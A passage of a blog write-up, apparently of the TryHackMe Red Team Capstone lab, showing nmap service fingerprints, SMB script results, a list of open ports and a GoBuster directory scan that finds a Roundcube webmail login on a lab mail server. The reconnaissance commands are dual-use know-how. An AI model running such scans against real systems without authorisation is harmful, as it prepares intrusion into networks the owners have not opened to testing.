#C3E88D\">at<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF-Port33060-TCP:V<\/span><span style=\"color: #BABED8\">=7.94SVN%I=7%D=2\/6%Time=65C26F44%P=x86_64-pc-linux-gnu%r<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:(GenericLines,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #BABED8\">)%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">GetRequest,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0<\/span><span 
style=\"color: #BABED8\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">HTTPOptions,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:%r(RTSPRequest,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #BABED8\">)%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">RPCCheck,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">DNSVersionBindReqTCP,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">DNSStatusRequestTCP,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x0fInvalid\\x20message<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">SSLSes<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#FFCB6B\">SF:sionReq,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\x1a\\x0fInvalid\\x20message<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">TerminalServerCookie,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05<\/span><span style=\"color: #BABED8\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">TLSSessionReq,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x0fInvalid\\x20message<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">Kerberos,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">SMBProgNeg,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0<\/span><span style=\"color: #BABED8\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: 
#89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">X11Probe,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x0fInvalid\\x20message<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">Fo<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:urOhFourRequest,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">LPDString,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">LDAPSearchReq,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x0fInvalid\\x20message<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">SIPOptions,9,<\/span><span style=\"color: 
#FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">LANDesk-RC,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">TerminalServer,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">NCP,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">NotesRPC,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0<\/span><span style=\"color: #BABED8\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x0fInvalid\\x20mess<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:age<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">JavaRMI,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span 
style=\"color: #FFCB6B\">WMSReque<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:st,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">oracle-tns,32,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:8\\x05\\x1a\\0%\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x16Invalid\\x20message-frame<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\.<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">giop,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Info:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Host:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">OS:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">CPE:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cpe:\/o:microsoft:windows<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span 
style=\"color: #C3E88D\">script<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">results:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smb2-time:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T17:42:19<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">start_date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">N\/A<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smb2-security-mode:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">3:1:1:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">Message<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">signing<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">enabled<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">but<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">required<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>We have quite a few 
ports open, but these are the most interesting to us:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>22 for SSH<\/li>\n\n\n\n<li>25\/587 for SMTP<\/li>\n\n\n\n<li>139\/445 for SMB<\/li>\n\n\n\n<li>80 for HTTP<\/li>\n\n\n\n<li>3389 for RDP<\/li>\n\n\n\n<li>33060 for MySQL<\/li>\n<\/ul>\n\n\n\n<p>We will need credentials to interact with most of the open services. Let&#8217;s start with HTTP and see what is running on it.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"13-http-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">HTTP<\/mark><\/h4>\n\n\n\n<p>Browsing to the FQDN returns a <code>403 - Forbidden<\/code> status.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09104ab9&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09104ab9\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"256\" data-attachment-id=\"558\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/403-forbidden\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?fit=1305%2C326&amp;ssl=1\" data-orig-size=\"1305,326\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"403-forbidden\" data-image-description=\"\" 
data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?fit=1024%2C256&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?resize=1024%2C256&#038;ssl=1\" alt=\"\" class=\"wp-image-558\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?resize=1024%2C256&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?resize=300%2C75&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?resize=768%2C192&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?w=1305&amp;ssl=1 1305w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>But using the 
IP, we see the default page for the Microsoft IIS server. That does not mean there is nothing else to explore here: the web server may have hidden directories, which we can enumerate with a tool like <code>GoBuster<\/code>.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910516d&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910516d\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"486\" data-attachment-id=\"563\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/iis-server\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?fit=1024%2C486&amp;ssl=1\" data-orig-size=\"1024,486\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"IIS-Server\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?fit=1024%2C486&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?resize=1024%2C486&#038;ssl=1\" 
alt=\"\" class=\"wp-image-563\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?w=1024&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?resize=300%2C142&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?resize=768%2C365&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"14-gobuster-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">GoBuster<\/mark><\/h5>\n\n\n\n<p>GoBuster was able to find some hidden directories. 
The <code>\/index.php<\/code> page has a login page for the Roundcube Webmail app.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span 
style=\"color: #C3E88D\">dir<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/mail.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-w<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-x<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v3.6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">by<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OJ<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Reeves<\/span><span style=\"color: #BABED8\"> (@TheColonial) <\/span><span style=\"color: #89DDFF\">&amp;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Christian<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Mehlmauer<\/span><span style=\"color: #BABED8\"> (@firefart)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Url:                     http:\/\/mail.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: 
#89DDFF\">]<\/span><span style=\"color: #BABED8\"> Method:                  GET<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Threads:                 10<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Negative Status codes:   404<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> User Agent:              gobuster\/3.6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Extensions:              php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Timeout:                 10s<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">gobuster<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">directory<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">enumeration<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mode<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">===============================================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/index.php<\/span><span style=\"color: #BABED8\">            (Status: <\/span><span style=\"color: #F78C6C\">200<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">5345<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/skins<\/span><span style=\"color: #BABED8\">                (Status: <\/span><span style=\"color: #F78C6C\">301<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">156<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> http:\/\/mail.thereserve.loc\/skins\/<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/plugins<\/span><span style=\"color: #BABED8\">              (Status: <\/span><span style=\"color: #F78C6C\">301<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">158<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> http:\/\/mail.thereserve.loc\/plugins\/<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span 
class=\"line\"><span style=\"color: #FFCB6B\">\/program<\/span><span style=\"color: #BABED8\">              (Status: <\/span><span style=\"color: #F78C6C\">301<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">158<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> http:\/\/mail.thereserve.loc\/program\/<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/Index.php<\/span><span style=\"color: #BABED8\">            (Status: <\/span><span style=\"color: #F78C6C\">200<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">5345<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\/vendor<\/span><span style=\"color: #BABED8\">               (Status: <\/span><span style=\"color: #F78C6C\">301<\/span><span style=\"color: #BABED8\">) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">Size: <\/span><span style=\"color: #F78C6C\">157<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: 